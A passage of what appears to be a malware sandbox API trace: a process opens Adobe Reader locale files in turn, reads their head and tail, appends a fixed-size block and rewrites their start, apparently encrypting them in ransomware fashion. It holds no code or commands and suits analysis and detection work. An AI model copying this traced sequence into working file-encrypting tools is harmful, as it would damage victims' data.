lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.133] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.133] ReleaseMutex (hMutex=0x168) returned 1 [0085.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SKY", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0085.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SKY", cchWideChar=7, lpMultiByteStr=0x1f7aa8c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.SKY", lpUsedDefaultChar=0x0) returned 7 [0085.133] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3600 [0085.142] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.155] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3600 [0085.156] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.156] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.156] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.156] CloseHandle (hObject=0x1cc) returned 1 [0085.157] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\RdLang32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\rdlang32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.157] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.157] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x148400 [0085.157] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.158] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.158] ReleaseMutex (hMutex=0x168) returned 1 [0085.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SKY", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SKY", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.SKY", lpUsedDefaultChar=0x0) returned 12 [0085.158] ReadFile (in: hFile=0x1cc, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0085.164] ReadFile (in: hFile=0x1cc, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.172] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x147400 [0085.172] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.180] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x147400 [0085.181] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.181] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.181] WriteFile (in: hFile=0x1cc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.182] WriteFile (in: hFile=0x1cc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.182] CloseHandle (hObject=0x1cc) returned 1 [0085.182] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Spelling.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\spelling.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.434] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.434] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2800 [0085.435] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.435] ReleaseMutex (hMutex=0x168) returned 1 [0085.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SKY", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SKY", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.SKY", lpUsedDefaultChar=0x0) returned 12 [0085.435] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.439] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1800 [0085.440] ReadFile (in: hFile=0x204, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.446] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1800 [0085.446] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.446] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.446] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.447] CloseHandle (hObject=0x204) returned 1 [0085.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Checkers.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\checkers.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.448] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.448] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1d800 [0085.448] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.449] ReleaseMutex (hMutex=0x168) returned 1 [0085.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SLV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SLV", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.SLV", lpUsedDefaultChar=0x0) returned 12 [0085.449] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.456] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c800 [0085.456] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.456] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c800 [0085.457] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.457] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.457] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.457] CloseHandle (hObject=0x204) returned 1 [0085.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\PDDom.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\pddom.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.459] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.459] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2c00 [0085.459] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.459] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.459] ReleaseMutex (hMutex=0x168) returned 1 [0085.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.SLV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.SLV", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.SLV", lpUsedDefaultChar=0x0) returned 9 [0085.460] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.465] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c00 [0085.465] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.466] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c00 [0085.466] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.467] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.467] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.467] CloseHandle (hObject=0x204) returned 1 [0085.467] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.468] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.468] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9103 [0085.469] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.469] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.469] ReleaseMutex (hMutex=0x168) returned 1 [0085.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.469] ReadFile (in: hFile=0x204, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.479] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8103 [0085.479] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.479] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8103 [0085.480] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.480] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.480] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.480] CloseHandle (hObject=0x204) returned 1 [0085.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Annots.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\annots.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.481] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.481] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x76c00 [0085.481] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.482] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.482] ReleaseMutex (hMutex=0x168) returned 1 [0085.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SVE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SVE", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.SVE", lpUsedDefaultChar=0x0) returned 10 [0085.482] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.488] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x75c00 [0085.488] ReadFile (in: hFile=0x204, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.490] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x75c00 [0085.491] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.492] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.492] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.492] CloseHandle (hObject=0x204) returned 1 [0085.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\makeaccessible.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\makeaccessible.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.493] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.494] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x11e00 [0085.494] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.494] ReleaseMutex (hMutex=0x168) returned 1 [0085.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.SVE", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.SVE", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.SVE", lpUsedDefaultChar=0x0) returned 18 [0085.494] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.841] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10e00 [0085.844] ReadFile (in: hFile=0x204, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.844] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10e00 [0085.844] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.845] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.845] WriteFile (in: hFile=0x204, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, 